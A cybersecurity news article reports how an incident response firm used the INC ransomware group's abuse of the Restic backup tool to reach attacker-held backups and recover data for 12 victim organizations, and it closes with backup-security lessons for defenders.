A rare incident response case has highlighted a critical blind spot in many organizations’ ransomware defenses. Cybersecurity firm Cyber Centaurs reports that it gained access to infrastructure linked to the INC ransomware operation, located encrypted backups stored by the threat actors themselves, and successfully restored data for 12 U.S. organizations previously hit by extortion attacks.
From Single Ransomware Incident to INC Ransomware Infrastructure
The investigation began when a U.S. company reported suspicious activity on a production Microsoft SQL Server. Forensic analysis confirmed a ransomware incident involving a variant dubbed RainINC, a modification of the INC ransomware family executed from the PerfLogs directory.
PerfLogs is a system folder created by Windows for performance logging, but in recent years it has become a common hiding place for malware because its presence and name appear benign in most environments. This allowed the attackers to blend their payload into routine system activity.
During incident response, analysts identified traces of the legitimate backup tool Restic on the compromised system. Although, in this case, Restic did not appear to be used for direct data theft—exfiltration happened earlier during lateral movement—its presence proved crucial for pivoting from a single endpoint compromise to the broader INC ransomware backend infrastructure.
Abusing Restic for Stealthy Ransomware Backups
Indicators of INC’s activity included renamed binaries (for example, winupdate.exe masquerading as a system updater), PowerShell scripts used to launch Restic, and hard-coded configuration parameters revealing repository URLs, backup commands, and cloud storage credentials.
PowerShell, Base64 Encoding and Hard‑coded Access Keys
A PowerShell script named new.ps1 drew particular attention. It contained Restic commands encoded in Base64 and environment variables with embedded secrets: access keys, S3-compatible passwords, and paths to encrypted backup repositories. This is a classic example of attackers “living off the land” by abusing legitimate tools to make detection harder.
By decoding and analyzing these scripts, Cyber Centaurs concluded that INC operators were reusing the same Restic-based infrastructure across multiple campaigns. Importantly, many associated repositories were not destroyed immediately after each extortion attempt. As a result, stolen datasets remained stored in encrypted form on attacker-controlled cloud storage for an extended period.
Discovery and Decryption of Data from 12 Victim Organizations
Access to this Restic infrastructure confirmed the hypothesis of “long-lived” attacker backups. Cyber Centaurs discovered encrypted archives belonging to 12 unrelated companies across healthcare, manufacturing, technology, and professional services. None of these organizations were their clients, and each represented an independent INC ransomware campaign.
The incident response team was able to decrypt and preserve these backups, then coordinated with law enforcement to identify the impacted organizations and plan next steps. This case demonstrates that, contrary to extortion claims about “irreversible destruction” of data, attacker-held backups can sometimes be recovered and used to restore information thought to be permanently lost.
Industry reports such as the Verizon Data Breach Investigations Report and analyses by companies like Chainalysis, which estimated known ransomware payments at over $1.1 billion in 2023, consistently show that ransomware remains one of the most damaging cyber threats. The INC case underscores that the impact of these attacks is deeply tied to how both defenders and attackers handle backups.
INC Ransomware Tactics, Techniques and Procedures (TTPs)
Cyber Centaurs’ report highlights several tools and techniques consistently used by the INC ransomware group:
Trace-cleaning utilities. These include log wipers and tools to disable logging and antivirus components, reducing the forensic footprint and complicating incident reconstruction.
Remote access tools. The group relies on both legitimate RMM (Remote Monitoring and Management) solutions and unauthorized remote desktop software to maintain persistent access and move laterally across networks.
Network reconnaissance utilities. Scanners and discovery tools are used to map infrastructure, identify high-value systems such as domain controllers and backup servers, and prioritize targets for encryption and data theft.
To help defenders, Cyber Centaurs released YARA and Sigma rules aimed at detecting Restic usage (including binaries run under misleading names) and unusual backup operations from atypical directories. Such patterns can indicate preparation for data exfiltration or an imminent ransomware deployment.
Key Lessons for Defenders: Backup Security and Ransomware Resilience
The INC ransomware case highlights several strategic lessons for organizations strengthening their ransomware defenses:
1. Legitimate tools are a primary attack vector. Adversaries extensively abuse backup and administration tools such as Restic, Veeam, Rclone and similar utilities. Security programs must include tight access control, monitoring and auditing for these tools, not just traditional malware signatures.
2. Shadow backups on attacker infrastructure are now standard. Modern ransomware attacks rarely rely on encryption alone. They often include systematic creation of “shadow” backups on attacker-controlled storage to support double or triple extortion—encrypting, leaking, and reselling data.
3. Backup operations themselves must be monitored. Organizations need to control who can create backups, what can be backed up, and where those backups may be stored. Unusual backup jobs—especially those running at night, from non-standard directories, or under newly created accounts—should trigger immediate investigation.
4. Detection rules and restoration drills are essential. Security teams should integrate detection of Restic and similar tools into SIEM and EDR platforms, ingest new YARA and Sigma rules from reputable research teams, and regularly test ransomware recovery scenarios to validate that offline and offsite backups are both intact and usable.
The INC ransomware investigation shows that effective backup governance can do more than mitigate damage; in rare cases, it can even enable recovery of data stored on attacker systems. Treating backup infrastructure and backup tools as Tier 0 assets—with strict access control, continuous monitoring, and well-rehearsed recovery procedures—significantly increases an organization’s chances of withstanding modern ransomware operations and limiting the leverage of extortion groups.
